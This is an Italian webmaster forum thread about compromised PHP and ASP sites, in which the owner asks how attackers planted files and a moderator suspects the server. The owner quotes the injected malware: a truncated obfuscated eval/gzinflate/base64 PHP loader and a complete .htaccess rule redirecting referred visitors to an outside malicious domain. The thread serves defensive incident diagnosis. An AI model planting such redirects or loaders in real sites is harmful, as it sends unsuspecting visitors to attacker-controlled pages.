• D
    User Attivo

    Problema Iframe Exploit su pagine php e asp

    Ho avuto 3 attacchi iframe exploit su 3 siti diversi il 2 di novembre.

    2 siti fatti in php con la stessa piattaforma CMS (no joomla o altro, ma php puro), su hosting aruba condiviso
    1 sito in asp su hosting di piccola azienda

    Per i 2 siti di aruba i permessi sono settati a 555 su tutto il sito tranne tre cartelle a 755 per l'upload dei file
    Per il sito in asp invece i permessi non danno modo di scrivere file su disco, dove i php non girano nemmeno e voglio capire come ha potuto sto "maledetto" farli girare!

    In pratica l'attacco ha creato in alcune cartelle dei siti i file htaccess e default.php dove all'interno del file php c'è una stringa compressa:

    eval (gzinflate(base64_decode('s127ezsS/...bA236UA1')));

    che ho decompresso ed ho trovato codice php che va a fare le sue cavolate e nel file htaccess questo:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ 
    RewriteRule ^.*$ http://candcworld.net/default.php?o=703561&s=1 [L,R]
</IfModule>

    Ora io ho ricontrollato tutto il codice delle app per capire dove possa essere entrato, negli script di upload ho controllato, ma tutto viene filtrato per estensioni ed anche creando un fake php con un'estensione valida di upload poi non si riesce a farlo girare.

    Voglio quindi capire secondo voi se possono essere entrati in altro modo oppure hanno sfruttato qualcosa che ovviamente non ho ancora trovato per fare l'upload del file "genitore" di tutto.

    La cosa che mi fa pensare è che l'attacco sia stato fatto su due tipi di hosting diversi PHP e ASP e sul secondo dove i php non girano ed i permessi sono blindati.

    0
  • T
    ModSenior

    Ciao deivnet,
    la prima cosa da fare era appunto controllare tutte le pagine che effettuano upload di file.
    Altri metodi per eseguire codice che faccia una cosa del genere si può dire non ce ne sono, a meno che lo script non fà cose strane come eseguire eval e in quel caso bisognerebbe fare attenzione ad ogni singolo dato di input.
    Gli script che utilizzi sono tuoi o open source?

    0
  • D
    User Attivo

    Ciao Thedarkita,
    gli script sono miei, lo ho controllati per vedere se ci fosse qualche buco o falla particolare, ma non ne ho trovati, anche perchè poi sono molto semplici e li ho pensati ragionando il più possibile ad evitare eventuali "intrusioni". Fortunatamente non ho nessuno script mio che effettui degli eval, la cosa che mi lascia perplesso è però quella sul sito hostato su spazio asp che non supporta php su cui sono riusciti a caricare comunque la pagine.

    0
  • T
    ModSenior

    A questo punto io propenderei per un problema del server, e non dei tuoi script.

    0
  • D
    User Attivo

    Per scrupolo sto facendo girare su tutte le macchine dello studio l'antivirus per essere sicuro che non ci sia qualche infezione che mi spara via i dati senza saperlo.

    0
Effettua l'accesso per rispondere